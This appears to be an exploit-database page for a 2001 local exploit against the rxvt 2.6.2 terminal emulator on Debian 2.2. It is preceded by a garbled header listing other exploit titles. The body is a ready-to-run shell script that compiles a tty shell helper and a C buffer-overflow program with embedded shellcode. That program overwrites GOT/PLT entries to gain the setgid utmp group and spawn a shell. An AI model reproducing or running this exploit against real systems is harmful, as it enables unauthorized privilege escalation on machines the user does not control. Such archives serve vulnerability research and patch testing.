880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
180 lines
No EOL
5 KiB
Bash
Executable file
180 lines
No EOL
5 KiB
Bash
Executable file
source: https://www.securityfocus.com/bid/2878/info
|
|
|
|
Rxvt is a color VT102 terminal emulator for X intended as an xterm(1) replacement.
|
|
|
|
A buffer overflow vulnerability exists in rxvt.
|
|
|
|
The error occurs when certain command line options with long arguments are passed to rxvt.
|
|
|
|
Because rxvt is installed setgid 'utmp' by some system configurations, it may be possible for local users to execute arbitrary code/commands with these privileges.
|
|
|
|
#!/bin/sh
|
|
|
|
#
|
|
# MasterSecuritY <www.mastersecurity.fr>
|
|
#
|
|
# xrxvt.sh - Local exploit for xrxvt 2.6.2
|
|
# Copyright (C) 2001 Michel "MaXX" Kaempf <maxx@mastersecurity.fr>
|
|
# Copyright (C) 2001 Samuel "Zorgon" Dralet <samuel.dralet@mastersecurity.fr>
|
|
#
|
|
# This program is free software; you can redistribute it and/or modify
|
|
# it under the terms of the GNU General Public License as published by
|
|
# the Free Software Foundation; either version 2 of the License, or (at
|
|
# your option) any later version.
|
|
#
|
|
# This program is distributed in the hope that it will be useful,
|
|
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
# General Public License for more details.
|
|
#
|
|
# You should have received a copy of the GNU General Public License
|
|
# along with this program; if not, write to the Free Software
|
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
# USA
|
|
#
|
|
|
|
echo "rxvt-2.6.2 exploit for Linux Debian 2.2"
|
|
echo "Which target :"
|
|
echo -e "\t0. rxvt 2.6.2 (package deb) on Debian 2.2"
|
|
echo -e "\t1. rxvt 2.6.2 (tarball) on Debian 2.2"
|
|
echo
|
|
echo -n "target : "
|
|
|
|
read TARGET
|
|
|
|
cat > /tmp/xx.c <<EOF
|
|
#include <unistd.h>
|
|
#include <sys/types.h>
|
|
#include <sys/stat.h>
|
|
#include <fcntl.h>
|
|
|
|
int main()
|
|
{
|
|
char * p_ttyname;
|
|
char * argv[] = { "/bin/sh", NULL };
|
|
|
|
p_ttyname = ttyname( STDERR_FILENO );
|
|
if ( p_ttyname == NULL ) {
|
|
return( -1 );
|
|
}
|
|
if ( open(p_ttyname, O_RDONLY) != STDIN_FILENO ) {
|
|
return( -1 );
|
|
}
|
|
if ( open(p_ttyname, O_WRONLY) != STDOUT_FILENO ) {
|
|
return( -1 );
|
|
}
|
|
|
|
execve( argv[0], argv, NULL );
|
|
return( -1 );
|
|
}
|
|
EOF
|
|
gcc -o /tmp/xx /tmp/xx.c
|
|
rm -f /tmp/xx.c
|
|
|
|
cat > /tmp/xrxvt.c << EOF
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
#include <X11/X.h>
|
|
#include <X11/Xlib.h>
|
|
|
|
#define BUF 256 /* buffer size */
|
|
#define EBP 4
|
|
#define EIP 4
|
|
#define ESC 3 /* alignment */
|
|
|
|
#define GID "\x2b"
|
|
#define DISPLAY ":0"
|
|
#define STACK ( 0xc0000000 - 4 )
|
|
|
|
Display *d;
|
|
|
|
char shellcode[] =
|
|
/* setregid( -1, GID ); */
|
|
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1"GID"\x31\xc0\xb0\x47\xcd\x80"
|
|
/* setregid( GID, GID ); */
|
|
"\x31\xdb\x31\xc9\xb3"GID"\xb1"GID"\x31\xc0\xb0\x47\xcd\x80"
|
|
/* Aleph One ;) */
|
|
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
|
|
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
|
|
"\x80\xe8\xdc\xff\xff\xff/tmp/xx";
|
|
|
|
struct os
|
|
{
|
|
int id;
|
|
char *desc;
|
|
char *path;
|
|
unsigned long plt;
|
|
unsigned long got;
|
|
};
|
|
|
|
struct os target[]=
|
|
{
|
|
{ 0, "rxvt 2.6.2 (package deb) on Debian 2.2", "/usr/X11R6/bin/rxvt-xterm",
|
|
0x0804add0, 0x0805c964 },
|
|
{ 1, "rxvt 2.6.2 (tarball) on Debian 2.2", "/usr/local/bin/rxvt",
|
|
0x0804a690, 0x08059e1c },
|
|
{ 2, NULL, 0, 0 }
|
|
};
|
|
|
|
void usage ( char *cmd )
|
|
{
|
|
int i;
|
|
fprintf(stderr, "rxvt-2.6.2 exploit for Linux Debian 2.2\n");
|
|
fprintf(stderr, "usage: %s <target>\n",cmd);
|
|
fprintf(stderr, "with target:\n\n");
|
|
for( i < 0; i < sizeof(target) / sizeof(struct os); i++ )
|
|
fprintf(stderr, "%d. %s\n", i, target[i].desc);
|
|
|
|
exit( -1 );
|
|
}
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
char buffer[ BUF - ESC + EBP + EIP + 12 + 1];
|
|
char * exec_argv[] = { NULL, "-T", buffer, NULL };
|
|
char * envp[] = { shellcode, NULL };
|
|
int i, t;
|
|
char *path;
|
|
|
|
if ( argc != 2 )
|
|
usage(argv[0]);
|
|
|
|
t = atoi(argv[1]);
|
|
if( t < 0 || t >= sizeof(target) / sizeof(struct os) )
|
|
usage( argv[0] );
|
|
|
|
path = (char *)malloc(strlen(target[t].path)+1);
|
|
strcpy(path,target[t].path);
|
|
|
|
if ( (d = XOpenDisplay(DISPLAY)) == NULL ){
|
|
fprintf(stderr, "Unable to open display: %s\n", DISPLAY);
|
|
exit(10);
|
|
}
|
|
|
|
for ( i = 0; i < BUF - ESC + EBP; i++ ) {
|
|
buffer[ i ] = 'A';
|
|
}
|
|
|
|
*( (size_t *) &(buffer[i]) ) = target[t].plt;
|
|
i += sizeof(size_t);
|
|
*( (size_t *) &(buffer[i]) ) = target[t].got + 4;
|
|
i += sizeof(size_t);
|
|
*( (size_t *) &(buffer[i]) ) = target[t].got + 4;
|
|
i += sizeof(size_t);
|
|
*( (size_t *) &(buffer[i]) ) = STACK - (strlen(path) + 1) - sizeof(shellcode);
|
|
i += sizeof(size_t);
|
|
|
|
buffer[i] = '\0';
|
|
|
|
exec_argv[0] = path;
|
|
execve( exec_argv[0], exec_argv, envp );
|
|
return( -1 );
|
|
}
|
|
EOF
|
|
gcc -o /tmp/xrxvt /tmp/xrxvt.c -lX11
|
|
rm -f /tmp/xrxvt.c
|
|
|
|
echo "Go to rxvt window and type 'echo -ne \"\033[21t\"' ..."
|
|
echo "And see ..."
|
|
/tmp/xrxvt $TARGET |